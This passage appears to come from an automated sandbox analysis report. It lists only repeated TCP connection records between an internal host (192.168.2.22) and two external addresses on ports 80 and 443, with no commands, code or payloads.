        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167
